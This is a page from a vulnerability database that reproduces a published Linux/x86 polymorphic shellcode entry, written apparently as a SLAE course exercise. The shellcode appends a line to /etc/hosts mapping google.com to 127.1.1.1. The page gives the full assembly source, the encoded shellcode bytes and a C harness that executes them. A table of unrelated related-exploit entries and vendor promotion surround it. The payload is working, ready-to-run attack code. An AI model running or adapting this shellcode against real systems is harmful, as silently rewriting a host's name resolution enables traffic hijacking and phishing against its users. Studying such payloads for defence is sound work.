Linux/x86 /etc/hosts Mapping Add Polymorphic Shellcode
| Reporter | Title | Published | Views | Family All 62 |
|---|---|---|---|---|
| Background Intelligent Transfer Service CVE-2020-0787 - Privilege Escalation | 12 Jun 202013:15 | – | 0daydb | |
| Linux/x86 ASLR Deactivation Polymorphic - Shellcode | 12 Jun 202013:13 | – | 0daydb | |
| Background Intelligent Transfer Service Privilege Escalation Exploit | 12 Jun 202000:00 | – | zdt | |
| Top Routinely Exploited Vulnerabilities | 20 Aug 202112:00 | – | ics | |
| #StopRansomware: RansomHub Ransomware | 29 Aug 202412:00 | – | ics | |
| CVE-2020-0787 Windows BITS Privesc | 12 Mar 202000:00 | – | attackerkb | |
| The vulnerability of the Windows Background Intelligent Transfer Service, a file transfer service between the client and the HTTP server, allows a hacker to escalate their privileges. | 25 Mar 202000:00 | – | bdu_fstec | |
| CVE-2020-0787 | 12 Apr 202020:36 | – | circl | |
| Microsoft Windows Background Intelligent Transfer Service (BITS) Improper Privilege Management Vulnerability | 28 Jan 202200:00 | – | cisa_kev | |
| CISA Adds Eight Known Exploited Vulnerabilities to Catalog | 28 Jan 202200:00 | – | cisa |
10
# Title: Linux/x86 - Add map in /etc/hosts file polymorphic shellcode ( 102 bytes )
# Author: Xenofon Vassilakopoulos
# Date: 2020-06-15
# Tested on: Linux kali 5.3.0-kali2-686-pae #1 SMP Debian 5.3.9-3kali1 (2019-11-20) i686 GNU/Linux
# Architecture: i686 GNU/Linux
# Shellcode Length: 102 bytes
# Original shellcode: http://shell-storm.org/shellcode/files/shellcode-893.php
# SLAE-ID: SLAE - 1314
# Description: Adding a network map in /etc/hosts file
------------------ ASM ------------------
global _start
section .text
_start:
xor ecx, ecx
xor edx, edx
xor eax, eax
mov DWORD [esp-0x4],ecx
mov DWORD [esp-0x8],0x7374736f
mov DWORD [esp-0xc],0x682f2f2f
mov DWORD [esp-0x10],0x6374652f
sub esp,0x10
mov ebx,esp
mov cx, 0x3b1 ;permmisions
add cx, 0x50
mov al, 0x5
int 0x80 ;syscall to open file
mov ebx, eax
xor eax, eax
jmp short _ldata ;jmp-call-pop technique to load the map
write_data:
pop ecx
mov dl,0x12
add dl,0x3
mov al,0x4
int 0x80
add al,0x2
int 0x80
xor eax,eax
mov al,0x1
int 0x80
_ldata:
call write_data
message db "127.1.1.1 google.com",0x0A
------------------ Shellcode ------------------
#include <stdio.h>
#include <string.h>
unsigned char code[] = \
"\x31\xc9\x31\xc0\x89\x4c\x24\xfc\xc7\x44\x24\xf8\x6f\x73\x74\x73\xc7\x44\x24"
"\xf4\x2f\x2f\x2f\x68\xc7\x44\x24\xf0\x2f\x65\x74\x63\x83\xec\x10\x89\xe3\x66"
"\xb9\xb1\x03\x66\x83\xc1\x50\xb0\x05\xcd\x80\x89\xc3\x31\xc0\xeb\x14\x59\xb2"
"\x12\x80\xc2\x02\xb0\x04\xcd\x80\x04\x02\xcd\x80\x31\xc0\xb0\x01\xcd\x80\xe8"
"\xe7\xff\xff\xff\x31\x32\x37\x2e\x31\x2e\x31\x2e\x31\x20\x67\x6f\x6f\x67\x6c"
"\x65\x2e\x63\x6f\x6d\x0a\x0d";
int main()
{
printf("Shellcode Length: %d\n", strlen(code));
int (*ret)() = (int(*)())code;
ret();
}Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
16 Jun 2020 12:57Current
EPSS0.42524